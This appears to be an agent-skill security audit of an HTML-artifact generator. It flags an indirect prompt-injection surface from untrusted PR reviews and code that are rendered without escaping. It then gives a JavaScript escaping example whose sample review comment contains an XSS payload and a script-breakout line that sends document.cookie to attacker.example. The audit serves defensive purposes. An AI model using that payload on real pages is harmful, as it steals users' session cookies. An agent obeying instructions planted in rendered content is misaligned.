html-artifacts

Pass

Audited by Gen Agent Trust Hub on May 9, 2026

Risk Level: SAFE
Full Analysis
  • [DATA_EXFILTRATION]: The instructions proactively advise the agent to avoid embedding secrets or unnecessary sensitive data in the generated artifacts. They also forbid dependencies on CDNs, remote fonts, and analytics by default, which removes the outbound requests a remote resource would make when the artifact is opened.
  • [PROMPT_INJECTION]: The skill exposes an indirect prompt injection surface: it requires the agent to ingest and render untrusted workspace content (such as PR reviews and code) into HTML artifacts.
    • Ingestion points: Workspace files, pull request reviews, and external technical specifications described in SKILL.md.
    • Boundary markers: None explicitly defined in the instructions; the skill relies on the agent's ability to distinguish between its instructions and the data it is rendering.
    • Capability inventory: The skill uses file system write capabilities (creating .html files) and instructs the agent to verify referenced files or commands.
    • Sanitization: No sanitization or escaping requirements are stated for content embedded into HTML or JavaScript structures, so markup or a script-closing sequence in a review comment or code snippet would reach the artifact as written unless the agent escapes it on its own.
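As an added example (not code from the html-artifacts skill or from the audit), the following shows the escaping the Sanitization finding is about: the same untrusted PR review rendered once by direct interpolation and once with a context-specific escaper for the HTML body and for an inline script block. The helper names and the sample review comment are assumptions made for the example.

```javascript
// Added example: context-aware escaping for untrusted text that an agent
// embeds into a generated HTML artifact. Not part of the html-artifacts skill;
// the helper names and the sample review comment are assumptions.

// Escape for an HTML text or double-quoted attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Serialize data for an inline <script> block. JSON.stringify alone is not
// enough: a string containing "</script>" closes the block early, and
// U+2028/U+2029 are line terminators for some JavaScript parsers. Every
// replacement is still a valid JSON escape, so the value round-trips.
function jsonForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Naive rendering: interpolates the review text directly, the pattern the
// audit flags as unaddressed.
function renderUnsafe(review) {
  return `<h2>${review.title}</h2>
<p>${review.body}</p>
<script>const review = ${JSON.stringify(review)};</script>`;
}

// Hardened rendering: each interpolation uses the escaper for its context.
function renderSafe(review) {
  return `<h2>${escapeHtml(review.title)}</h2>
<p>${escapeHtml(review.body)}</p>
<script>const review = ${jsonForScript(review)};</script>`;
}

// Constructed sample: a PR review comment carrying two injection attempts,
// one aimed at the HTML context and one that breaks out of the script block.
const sampleReview = {
  title: 'LGTM <img src=x onerror="alert(1)">',
  body: 'Nice work. </script><script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
};

// Check: how many "</script>" closers does the page contain? A correctly
// escaped artifact has exactly one, the one the template itself writes.
function countScriptCloses(html) {
  return (html.match(/<\/script>/gi) || []).length;
}

// Check: does an untrusted string appear in the output verbatim?
function leaksRawText(html, untrusted) {
  return html.includes(untrusted);
}

console.log('unsafe </script> count:', countScriptCloses(renderUnsafe(sampleReview)));
console.log('safe   </script> count:', countScriptCloses(renderSafe(sampleReview)));
```

Run with `node`: the naive page contains five `</script>` closers (two in the paragraph, two inside the JSON literal, one from the template) and the review title verbatim; the hardened page contains one closer, and `JSON.parse` of the script payload still returns the original review text.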
Audit Metadata
Risk Level: SAFE
Analyzed: May 9, 2026, 06:57 AM